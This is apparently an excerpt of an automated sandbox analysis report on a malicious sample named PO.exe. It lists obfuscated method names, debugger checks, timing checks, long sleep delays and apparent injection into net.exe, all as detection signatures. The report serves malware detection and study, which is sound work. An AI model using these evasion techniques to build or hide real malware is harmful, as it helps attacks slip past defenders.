                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, IVOaPb56Xb9OTkQI7M.csHigh entropy of concatenated method names: 'zsJmv6WFyg', 'dfymRc5Uhg', 'KRNmmuJOEq', 'IsjmLhTMEt', 'zfXmsqLC6i', 'bT8mgT6lNP', 'Dispose', 'bC7KUwkUOY', 'JAGK48EQnI', 'eecKoTKaSP'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, kud7D5zoOcgaQh10wk.csHigh entropy of concatenated method names: 'PCiTDs15Zn', 'csFT14Qigy', 'PL1Twt6eVv', 'P3BTi1enV7', 'bw9TSwNDfC', 'kqHTyXC1ap', 'du6TjcFYnC', 'n3oTgn7Vts', 'ROsTP0jrsE', 'J4kTbjFFVQ'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, aFGfLmtI0beEl6pkeH.csHigh entropy of concatenated method names: 'RBcmiRUW2T', 'QeemSVZh0k', 'W2qmhgaUV9', 'z02myKJgik', 'ycEmjPl8J8', 'vGYmuU65Si', 'yt6m24syK9', 'ko0maksEEM', 'C7ymdUJdWJ', 'wfWm7Ql8As'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, FaSxNGoXstTskEWaLl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XgnMt0rHEu', 'QasMfmVrQ3', 'lO3MzaBFnF', 'Lp3k3ZLnOK', 'BALkYrYoCS', 'OKikMoNOc6', 'k19kk7p4kU', 'o9gh5wm1vH21iZdbKDF'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, jhT1XiYpCdoDYbJXImm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VlfnmGo12P', 'jAEnTO96AP', 'pkMnLjpDvf', 'F4bnn6HHwR', 'drxns2EHXc', 'nmSnAbsJqN', 'uVlngLZHX7'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, cV34pg4nlMsrLlgM57.csHigh entropy of concatenated method names: 'Dispose', 'y9OYtTkQI7', 'kFFMSwmVm0', 'DLr6wSy5o2', 'ci7YftxOjc', 'XBnYzfufQL', 'ProcessDialogKey', 'to3M3FGfLm', 'p0bMYeEl6p', 'deHMM8246S'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, JjfvtCpQ90QHC8YwOa.csHigh entropy of concatenated method names: 'qhQY6g4bTw', 'deNYcbeeam', 'hbHYlBh6yT', 'XkOYFAumRl', 'FWdYvx63v7', 'KlbYItoKQt', 'kD4UKlWQr2LA4Eya17', 'hLtNQ1cDfw24HSW5WT', 'FBEYYLo8si', 'XgeYkqig9o'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, GPgPkY2haQbtV4AXYS.csHigh entropy of concatenated method names: 'mBj6U6X0sQ', 'k2t6ocAH0D', 'XFA6Qev4re', 'EcxQfXGRFN', 'Or3QzPtbHa', 'ldn63GBU4x', 'nSI6YVBNYS', 'YY76Mp5w6w', 'IwU6kvasYh', 'Unu6pKLtYk'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.csHigh entropy of concatenated method names: 'I0TkrMi9YH', 'bp1kUD7LEb', 'XWMk46QZU2', 'c8CkokmOq5', 'YXskEHW5kX', 'KF3kQiux3l', 'GKrk68oABi', 'UcpkcZqhkO', 'qR6kJ9lbx2', 'QQqklirKsB'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, YfEwfPq0cNftvy77Y3.csHigh entropy of concatenated method names: 'Bt0C1Kf9cL', 'FKBCw2s2ip', 'JNdCiAjCYG', 'g8NCSttm9i', 'zFyCynAK4O', 'QoTCjhhK9T', 'enjC2iEZpl', 'KWcCalifbe', 'QGbC7Oousx', 'nGBCXiW6W3'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, KmRl7VxlriI9kxWdx6.csHigh entropy of concatenated method names: 'tGhE9KfFQs', 'fquENbN3ff', 'OTGohwWpFS', 'zH1oy2Th0G', 'n9Loj0tclK', 'MaKou33yKu', 'uEPo2322gY', 'unSoalFD1x', 'OZ0odxkUMX', 'mDro7CV8Wj'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, V246SPfLB9B0nkmoR9.csHigh entropy of concatenated method names: 'pQnTo7LBJp', 'bnjTEx1ZhC', 'TdVTQ8JDpm', 'iTAT6JaVd3', 'M8aTmDHgRm', 'fviTcM48Xa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, ig4bTw1peNbeeam7US.csHigh entropy of concatenated method names: 'lBM4VqfqQl', 'iHo4OYIcdQ', 'b4M4BTRVWN', 'M7c4ec5VQZ', 'wEJ40qujJn', 'TEu48aJeDG', 'GIH456t9gw', 'VhY4HHnp2D', 'ISB4t6tKMT', 'AbH4f5RAuT'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, OIjuNTe8TPtPScTDyL.csHigh entropy of concatenated method names: 'n6cRlZTS0t', 'EwSRFtsAhM', 'ToString', 'pL1RUB5bfm', 'VMuR4VbOgn', 'OCMRojeeO4', 'R1eREbW6Wy', 'XCcRQNGijL', 'PEOR6ldLg4', 'BeGRcqiUdU'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, Q5Zb9HBTdH5ROZccae.csHigh entropy of concatenated method names: 'ToString', 'G4TIXtMPYN', 'gy2IShOp7C', 'MgcIhwVmkj', 'LuCIyTdv4u', 'RXKIj9O8dK', 'keQIunAV1g', 'p97I2d2eJ6', 'TZVIayWwDg', 'u9qIdePS2r'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, LJXv6mVmARH9qRMaNn.csHigh entropy of concatenated method names: 'fiOv7KGPsT', 'emYvWAKdp5', 'e9ovVlVeZo', 'sw0vOvlufw', 'fVXvStrq6i', 'KigvhPKDOp', 'yP0vy9RAVQ', 'jYFvj4ZdTp', 'jdBvu60lmG', 'Q0Gv2YMMHq'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, PpQpfidHiMBRwlNE5t.csHigh entropy of concatenated method names: 'Qr76PJplyu', 'Nxf6bvrtVu', 'nS16Zy7H48', 'eWf6G16jeb', 'PDu69cMdIR', 'Kho6Dbl71Q', 'QOE6N9u5on', 'Jrp61gmJIr', 'knV6wfoyeu', 'ln96xjhx1c'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, TyBLcDYYLbql4ngERhe.csHigh entropy of concatenated method names: 'B0vTfUnHmk', 'TlqTzW3B94', 'ELcL3mnwqk', 'BCULYFJFdv', 'NT2LM5GvkT', 'pTILk9nBXT', 'AYXLpKUQiq', 'GqTLrV1De1', 'sVHLU2Pcyj', 'NAqL4kk2qX'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, av7ulbitoKQtA90BkM.csHigh entropy of concatenated method names: 'gxVQrX66Qs', 'BIaQ4faSwJ', 'rpFQE95QvW', 'cHxQ6rMHw4', 'fjhQcwqVCl', 'pWkE0V0FAs', 'fytE8JaDUe', 'tCaE5u4XcV', 'RFfEHqbDKo', 'NaQEticUjp'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, c8E47WY3nR71XXLfsaI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bf1TX2cyQZ', 'nJ5TWy9tKA', 'z37Tqt66FR', 'lkxTVsBumd', 'dbXTO4lWWV', 'njWTBh6NpB', 'L9ETekNkdC'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, bShmESM9SRrFA60ikF.csHigh entropy of concatenated method names: 'kB1ZIfPVf', 'NiLGgX98K', 'GWSD91EeN', 'F9KNvGmte', 'f7Dw8D4BJ', 'mxhxdBwBh', 'wjibBV2G2E9k6Zc9vd', 'EKR5CR7wRb4PFrrwQj', 'hXmKEbZTv', 'csaTqtnCv'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, GmfL8EwbHBh6yTtkOA.csHigh entropy of concatenated method names: 'eESoGpkep6', 'nfQoDiPZGi', 'AFWo1UUTBj', 'lg5owigcPg', 'nQYovpYH6v', 'WZGoInTMpl', 'QHioRli6ol', 'D5VoKVDUbW', 'jXdom9tg9P', 'BGqoT3yU8a'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, hlw9yp8pLPs8k0TdZx.csHigh entropy of concatenated method names: 'vAkRHEDXel', 'vdxRfHwWPC', 'I0KK3HeCCU', 'yv5KY6lCpp', 'yBYRXx0Aa0', 'k67RWjMJH1', 'oNsRqNy5qX', 'DhPRVUKNGB', 'J4bROZdv1w', 'UIIRBby8WM'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, IVOaPb56Xb9OTkQI7M.csHigh entropy of concatenated method names: 'zsJmv6WFyg', 'dfymRc5Uhg', 'KRNmmuJOEq', 'IsjmLhTMEt', 'zfXmsqLC6i', 'bT8mgT6lNP', 'Dispose', 'bC7KUwkUOY', 'JAGK48EQnI', 'eecKoTKaSP'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, kud7D5zoOcgaQh10wk.csHigh entropy of concatenated method names: 'PCiTDs15Zn', 'csFT14Qigy', 'PL1Twt6eVv', 'P3BTi1enV7', 'bw9TSwNDfC', 'kqHTyXC1ap', 'du6TjcFYnC', 'n3oTgn7Vts', 'ROsTP0jrsE', 'J4kTbjFFVQ'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, aFGfLmtI0beEl6pkeH.csHigh entropy of concatenated method names: 'RBcmiRUW2T', 'QeemSVZh0k', 'W2qmhgaUV9', 'z02myKJgik', 'ycEmjPl8J8', 'vGYmuU65Si', 'yt6m24syK9', 'ko0maksEEM', 'C7ymdUJdWJ', 'wfWm7Ql8As'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, FaSxNGoXstTskEWaLl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XgnMt0rHEu', 'QasMfmVrQ3', 'lO3MzaBFnF', 'Lp3k3ZLnOK', 'BALkYrYoCS', 'OKikMoNOc6', 'k19kk7p4kU', 'o9gh5wm1vH21iZdbKDF'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, jhT1XiYpCdoDYbJXImm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VlfnmGo12P', 'jAEnTO96AP', 'pkMnLjpDvf', 'F4bnn6HHwR', 'drxns2EHXc', 'nmSnAbsJqN', 'uVlngLZHX7'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, cV34pg4nlMsrLlgM57.csHigh entropy of concatenated method names: 'Dispose', 'y9OYtTkQI7', 'kFFMSwmVm0', 'DLr6wSy5o2', 'ci7YftxOjc', 'XBnYzfufQL', 'ProcessDialogKey', 'to3M3FGfLm', 'p0bMYeEl6p', 'deHMM8246S'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, JjfvtCpQ90QHC8YwOa.csHigh entropy of concatenated method names: 'qhQY6g4bTw', 'deNYcbeeam', 'hbHYlBh6yT', 'XkOYFAumRl', 'FWdYvx63v7', 'KlbYItoKQt', 'kD4UKlWQr2LA4Eya17', 'hLtNQ1cDfw24HSW5WT', 'FBEYYLo8si', 'XgeYkqig9o'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, GPgPkY2haQbtV4AXYS.csHigh entropy of concatenated method names: 'mBj6U6X0sQ', 'k2t6ocAH0D', 'XFA6Qev4re', 'EcxQfXGRFN', 'Or3QzPtbHa', 'ldn63GBU4x', 'nSI6YVBNYS', 'YY76Mp5w6w', 'IwU6kvasYh', 'Unu6pKLtYk'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.csHigh entropy of concatenated method names: 'I0TkrMi9YH', 'bp1kUD7LEb', 'XWMk46QZU2', 'c8CkokmOq5', 'YXskEHW5kX', 'KF3kQiux3l', 'GKrk68oABi', 'UcpkcZqhkO', 'qR6kJ9lbx2', 'QQqklirKsB'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, YfEwfPq0cNftvy77Y3.csHigh entropy of concatenated method names: 'Bt0C1Kf9cL', 'FKBCw2s2ip', 'JNdCiAjCYG', 'g8NCSttm9i', 'zFyCynAK4O', 'QoTCjhhK9T', 'enjC2iEZpl', 'KWcCalifbe', 'QGbC7Oousx', 'nGBCXiW6W3'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, KmRl7VxlriI9kxWdx6.csHigh entropy of concatenated method names: 'tGhE9KfFQs', 'fquENbN3ff', 'OTGohwWpFS', 'zH1oy2Th0G', 'n9Loj0tclK', 'MaKou33yKu', 'uEPo2322gY', 'unSoalFD1x', 'OZ0odxkUMX', 'mDro7CV8Wj'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, V246SPfLB9B0nkmoR9.csHigh entropy of concatenated method names: 'pQnTo7LBJp', 'bnjTEx1ZhC', 'TdVTQ8JDpm', 'iTAT6JaVd3', 'M8aTmDHgRm', 'fviTcM48Xa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, ig4bTw1peNbeeam7US.csHigh entropy of concatenated method names: 'lBM4VqfqQl', 'iHo4OYIcdQ', 'b4M4BTRVWN', 'M7c4ec5VQZ', 'wEJ40qujJn', 'TEu48aJeDG', 'GIH456t9gw', 'VhY4HHnp2D', 'ISB4t6tKMT', 'AbH4f5RAuT'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, OIjuNTe8TPtPScTDyL.csHigh entropy of concatenated method names: 'n6cRlZTS0t', 'EwSRFtsAhM', 'ToString', 'pL1RUB5bfm', 'VMuR4VbOgn', 'OCMRojeeO4', 'R1eREbW6Wy', 'XCcRQNGijL', 'PEOR6ldLg4', 'BeGRcqiUdU'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, Q5Zb9HBTdH5ROZccae.csHigh entropy of concatenated method names: 'ToString', 'G4TIXtMPYN', 'gy2IShOp7C', 'MgcIhwVmkj', 'LuCIyTdv4u', 'RXKIj9O8dK', 'keQIunAV1g', 'p97I2d2eJ6', 'TZVIayWwDg', 'u9qIdePS2r'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, LJXv6mVmARH9qRMaNn.csHigh entropy of concatenated method names: 'fiOv7KGPsT', 'emYvWAKdp5', 'e9ovVlVeZo', 'sw0vOvlufw', 'fVXvStrq6i', 'KigvhPKDOp', 'yP0vy9RAVQ', 'jYFvj4ZdTp', 'jdBvu60lmG', 'Q0Gv2YMMHq'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, PpQpfidHiMBRwlNE5t.csHigh entropy of concatenated method names: 'Qr76PJplyu', 'Nxf6bvrtVu', 'nS16Zy7H48', 'eWf6G16jeb', 'PDu69cMdIR', 'Kho6Dbl71Q', 'QOE6N9u5on', 'Jrp61gmJIr', 'knV6wfoyeu', 'ln96xjhx1c'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, TyBLcDYYLbql4ngERhe.csHigh entropy of concatenated method names: 'B0vTfUnHmk', 'TlqTzW3B94', 'ELcL3mnwqk', 'BCULYFJFdv', 'NT2LM5GvkT', 'pTILk9nBXT', 'AYXLpKUQiq', 'GqTLrV1De1', 'sVHLU2Pcyj', 'NAqL4kk2qX'
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: PO.exe PID: 5932, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: 13D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: 8F20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: 9F20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: A120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: B120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: BB20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: CB20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: DB20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004155F0 rdtsc 2_2_004155F0
                Source: C:\Users\user\Desktop\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 9818Jump to behavior
                Source: C:\Users\user\Desktop\PO.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\net.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\PO.exe TID: 2144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 2536Thread sleep count: 155 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 2536Thread sleep time: -310000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 2536Thread sleep count: 9818 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 2536Thread sleep time: -19636000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe TID: 4088Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0043C680 FindFirstFileW,FindNextFileW,FindClose,7_2_0043C680
                Source: C:\Users\user\Desktop\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: net.exe, 00000007.00000002.3002318934.0000000000611000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003562533.0000000000E09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.2590709912.000002E7CBF3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
                Source: C:\Users\user\Desktop\PO.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004155F0 rdtsc 2_2_004155F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_00417783 LdrLoadDll,2_2_00417783
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01788158 mov eax, dword ptr fs:[00000030h]2_2_01788158
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EC156 mov eax, dword ptr fs:[00000030h]2_2_016EC156
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6154 mov eax, dword ptr fs:[00000030h]2_2_016F6154
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6154 mov eax, dword ptr fs:[00000030h]2_2_016F6154
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01784144 mov eax, dword ptr fs:[00000030h]2_2_01784144
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01784144 mov eax, dword ptr fs:[00000030h]2_2_01784144
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01784144 mov ecx, dword ptr fs:[00000030h]2_2_01784144
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01784144 mov eax, dword ptr fs:[00000030h]2_2_01784144
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01784144 mov eax, dword ptr fs:[00000030h]2_2_01784144
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01720124 mov eax, dword ptr fs:[00000030h]2_2_01720124
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179A118 mov ecx, dword ptr fs:[00000030h]2_2_0179A118
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179A118 mov eax, dword ptr fs:[00000030h]2_2_0179A118
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179A118 mov eax, dword ptr fs:[00000030h]2_2_0179A118
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179A118 mov eax, dword ptr fs:[00000030h]2_2_0179A118
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B0115 mov eax, dword ptr fs:[00000030h]2_2_017B0115
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov ecx, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov ecx, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov ecx, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov ecx, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017201F8 mov eax, dword ptr fs:[00000030h]2_2_017201F8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C61E5 mov eax, dword ptr fs:[00000030h]2_2_017C61E5
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov eax, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov eax, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov eax, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov eax, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B61C3 mov eax, dword ptr fs:[00000030h]2_2_017B61C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B61C3 mov eax, dword ptr fs:[00000030h]2_2_017B61C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177019F mov eax, dword ptr fs:[00000030h]2_2_0177019F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177019F mov eax, dword ptr fs:[00000030h]2_2_0177019F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177019F mov eax, dword ptr fs:[00000030h]2_2_0177019F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177019F mov eax, dword ptr fs:[00000030h]2_2_0177019F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AC188 mov eax, dword ptr fs:[00000030h]2_2_017AC188
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AC188 mov eax, dword ptr fs:[00000030h]2_2_017AC188
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01730185 mov eax, dword ptr fs:[00000030h]2_2_01730185
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA197 mov eax, dword ptr fs:[00000030h]2_2_016EA197
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA197 mov eax, dword ptr fs:[00000030h]2_2_016EA197
